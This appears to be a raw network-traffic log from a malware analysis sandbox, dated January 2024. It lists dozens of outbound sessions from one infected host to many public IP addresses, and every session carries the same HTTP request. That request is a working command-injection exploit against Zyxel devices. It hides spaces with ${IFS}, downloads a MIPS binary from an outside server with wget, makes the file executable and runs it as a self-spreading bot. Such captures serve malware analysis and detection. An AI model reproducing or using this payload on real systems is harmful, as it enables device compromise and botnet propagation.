                                                Jan 12, 2024 18:16:21.407120943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4001192.168.2.2349420117.223.233.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407146931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4002192.168.2.234306023.197.191.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407200098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4003192.168.2.233860485.41.27.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407238960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4004192.168.2.234290891.83.20.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407272100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4005192.168.2.235094434.27.141.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407326937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4006192.168.2.2344040133.0.213.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407375097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4007192.168.2.235954080.91.61.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407404900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4008192.168.2.2340754147.203.213.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407429934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4009192.168.2.2334928182.150.219.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407460928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4010192.168.2.2350200191.2.146.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407505989 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4011192.168.2.2335512199.187.0.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407531977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4012192.168.2.2352956157.107.28.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407568932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4013192.168.2.234831470.14.39.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407613993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4014192.168.2.234118290.82.147.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407669067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4015192.168.2.234836474.14.165.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407697916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4016192.168.2.233615649.102.254.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407713890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4017192.168.2.2352138187.42.130.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407742977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4018192.168.2.2336238139.207.124.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407792091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4019192.168.2.2334796139.14.98.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407840967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4020192.168.2.2355124204.157.7.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407877922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4021192.168.2.235781857.236.206.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407931089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4022192.168.2.234369617.105.61.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.407962084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4023192.168.2.234897683.151.193.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408009052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4024192.168.2.2359588106.165.61.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408020020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4025192.168.2.2345254166.206.22.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408070087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4026192.168.2.234556020.60.223.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408096075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4027192.168.2.2348132176.85.24.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408144951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4028192.168.2.2347780200.54.213.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408173084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4029192.168.2.235323852.46.206.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408231020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4030192.168.2.233982893.86.77.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408257008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4031192.168.2.235071896.192.87.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408304930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4032192.168.2.233561464.105.140.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408335924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4033192.168.2.233612479.206.11.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408386946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4034192.168.2.2344726116.14.179.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408417940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4035192.168.2.2348292204.226.32.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408463955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4036192.168.2.2335870128.130.207.113443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408509016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4037192.168.2.2356344221.237.65.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408555984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4038192.168.2.2341318146.165.238.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408562899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4039192.168.2.2346576219.165.144.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408620119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4040192.168.2.235236018.247.180.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408684015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4041192.168.2.2354386191.94.111.83443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408721924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4042192.168.2.235820088.208.158.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408744097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4043192.168.2.2339110170.184.15.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408795118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4044192.168.2.2333186115.193.243.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408842087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4045192.168.2.234744018.215.171.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408870935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4046192.168.2.2359142204.50.5.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408931971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4047192.168.2.235639280.115.235.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408945084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4048192.168.2.2340192200.21.115.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.408994913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4049192.168.2.23395541.152.251.135443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409024000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4050192.168.2.234773613.232.115.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409060955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4051192.168.2.2333686131.95.193.31443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409091949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4052192.168.2.2337246117.74.130.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409137964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4053192.168.2.2344568148.129.118.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409176111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4054192.168.2.2352820206.17.245.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409215927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4055192.168.2.2354308151.222.249.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409250975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4056192.168.2.2346746166.179.215.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409265041 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4057192.168.2.2360244216.101.47.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409317970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4058192.168.2.234786879.177.220.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409338951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4059192.168.2.2338718180.65.221.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409394026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4060192.168.2.2335978195.64.232.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409426928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4061192.168.2.234229048.27.80.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409461021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4062192.168.2.2333218129.19.0.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:21.409502029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4063192.168.2.2335682180.51.179.13443
                                                TimestampBytes transferredDirectionData
